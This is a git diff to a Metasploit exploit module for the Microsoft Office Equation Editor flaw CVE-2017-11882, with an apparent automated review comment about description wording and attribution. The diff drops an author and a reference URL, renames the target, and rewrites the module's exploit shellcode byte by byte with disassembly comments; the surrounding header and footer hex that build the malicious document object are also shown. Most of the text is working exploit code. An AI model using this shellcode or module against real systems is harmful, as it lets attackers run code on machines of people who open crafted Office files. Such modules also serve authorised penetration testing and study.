diff --git a/modules/exploits/windows/fileformat/office_ms17_11882.rb b/modules/exploits/windows/fileformat/office_ms17_11882.rb
index 37f096f7ac..6aafc49c14 100644
--- a/modules/exploits/windows/fileformat/office_ms17_11882.rb
+++ b/modules/exploits/windows/fileformat/office_ms17_11882.rb
@@ -22,18 +22,17 @@ class MetasploitModule < Msf::Exploit::Remote
 a length of 109 bytes to be executed
 Affects Microsoft Office word for the latest 17 years.
 },
- 'Author' => ['mumbai', 'embedi', 'BlackMathIT'],
+ 'Author' => ['mumbai', 'embedi'],
 'License' => MSF_LICENSE,
 'DisclosureDate' => 'Nov 15 2017',
 'References' => [
 ['URL', 'https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about'],
- ['URL', 'https://github.com/embedi/CVE-2017-11882'],
- ['URL', 'https://github.com/BlackMathIT/2017-11882_Generator/blob/master/2017-11882_Generator.py']
+ ['URL', 'https://github.com/embedi/CVE-2017-11882']
 ],
 'Platform' => 'win',
 'Arch' => [ARCH_X86, ARCH_X64],
 'Targets' => [
- ['Microsoft Office Word', {} ],
+ ['Microsoft Office', {} ],
 ],
 'DefaultTarget' => 0,
 'Payload' => {
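Review bot: Renaming the target to `Microsoft Office` leaves the description line just above the `Author` change out of step, since it still reads `Affects Microsoft Office word for the latest 17 years.`; the same hunk should update it to `Affects Microsoft Office for the last 17 years.` so the module's own text no longer narrows the scope to Word (and "latest" becomes "last"). If any of the module's remaining content was derived from the BlackMathIT generator whose author and URL this hunk drops, that reference should stay for attribution; that cannot be judged from this hunk alone. The info hash these lines belong to begins and ends outside the hunk.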
@@ -131,11 +130,43 @@ class MetasploitModule < Msf::Exploit::Remote
 header << "000000000000000000000000000000000000000000000000000000000000000\n"
- shellcode = "\x1c\x00\x00\x00\x02\x00\x9e\xc4\xa9\x00\x00\x00\x00\x00\x00\x00"
- shellcode << "\xc8\xa7\\\x00\xc4\xee[\x00\x00\x00\x00\x00\x03\x01\x01\x03\n\n\x01\x08ZZ"
- shellcode << "\xB8\x44\xEB\x71\x12\xBA\x78\x56\x34\x12\x31\xD0\x8B\x08\x8B\x09\x8B\x09"
- shellcode << "\x66\x83\xC1\x3C\x31\xDB\x53\x51\xBE\x64\x3E\x72\x12\x31\xD6\xFF\x16\x53"
- shellcode << "\x66\x83\xEE\x4C\xFF\x10\x90\x90"
+ shellcode = "\x1c\x00" # 0: 1c 00 sbb al,0x0
+ shellcode << "\x00\x00" # 2: 00 00 add BYTE PTR [eax],al
+ shellcode << "\x02\x00" # 4: 02 00 add al,BYTE PTR [eax]
+ shellcode << "\x9e" # 6: 9e sahf
+ shellcode << "\xc4\xa9\x00\x00\x00\x00" # 7: c4 a9 00 00 00 00 les ebp,FWORD PTR [ecx+0x0]
+ shellcode << "\x00\x00" # d: 00 00 add BYTE PTR [eax],al
+ shellcode << "\x00\xc8" # f: 00 c8 add al,cl
+ shellcode << "\xa7" # 11: a7 cmps DWORD PTR ds:[esi],DWORD PTR es:[edi]
+ shellcode << "\\" # 12: 5c pop esp
+ shellcode << "\x00\xc4" # 13: 00 c4 add ah,al
+ shellcode << "\xee" # 15: ee out dx,al
+ shellcode << "[" # 16: 5b pop ebx
+ shellcode << "\x00\x00" # 17: 00 00 add BYTE PTR [eax],al
+ shellcode << "\x00\x00" # 19: 00 00 add BYTE PTR [eax],al
+ shellcode << "\x00\x03" # 1b: 00 03 add BYTE PTR [ebx],al
+ shellcode << "\x01\x01" # 1d: 01 01 add DWORD PTR [ecx],eax
+ shellcode << "\x03\n" # 1f: 03 0a add ecx,DWORD PTR [edx]
+ shellcode << "\n\x01" # 21: 0a 01 or al,BYTE PTR [ecx]
+ shellcode << "\x08ZZ" # 23: 08 5a 5a or BYTE PTR [edx+0x5a],bl
+ shellcode << "\xB8\x44\xEB\x71\x12" # 26: b8 44 eb 71 12 mov eax,0x1271eb44
+ shellcode << "\xBA\x78\x56\x34\x12" # 2b: ba 78 56 34 12 mov edx,0x12345678
+ shellcode << "\x31\xD0" # 30: 31 d0 xor eax,edx
+ shellcode << "\x8B\x08" # 32: 8b 08 mov ecx,DWORD PTR [eax]
+ shellcode << "\x8B\x09" # 34: 8b 09 mov ecx,DWORD PTR [ecx]
+ shellcode << "\x8B\x09" # 36: 8b 09 mov ecx,DWORD PTR [ecx]
+ shellcode << "\x66\x83\xC1\x3C" # 38: 66 83 c1 3c add cx,0x3c
+ shellcode << "\x31\xDB" # 3c: 31 db xor ebx,ebx
+ shellcode << "\x53" # 3e: 53 push ebx
+ shellcode << "\x51" # 3f: 51 push ecx
+ shellcode << "\xBE\x64\x3E\x72\x12" # 40: be 64 3e 72 12 mov esi,0x12723e64
+ shellcode << "\x31\xD6" # 45: 31 d6 xor esi,edx
+ shellcode << "\xFF\x16" # 47: ff 16 call DWORD PTR [esi]
+ shellcode << "\x53" # 49: 53 push ebx
+ shellcode << "\x66\x83\xEE\x4C" # 4a: 66 83 ee 4c sub si,0x4c
+ shellcode << "\xFF\x10" # 4e: ff 10 call DWORD PTR [eax]
+ shellcode << "\x90" # 50: 90 nop
+ shellcode << "\x90" # 50: 90 nop
 footer = '0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'
 footer << '4500710075006100740069006F006E0020004E006100740069007600650000000'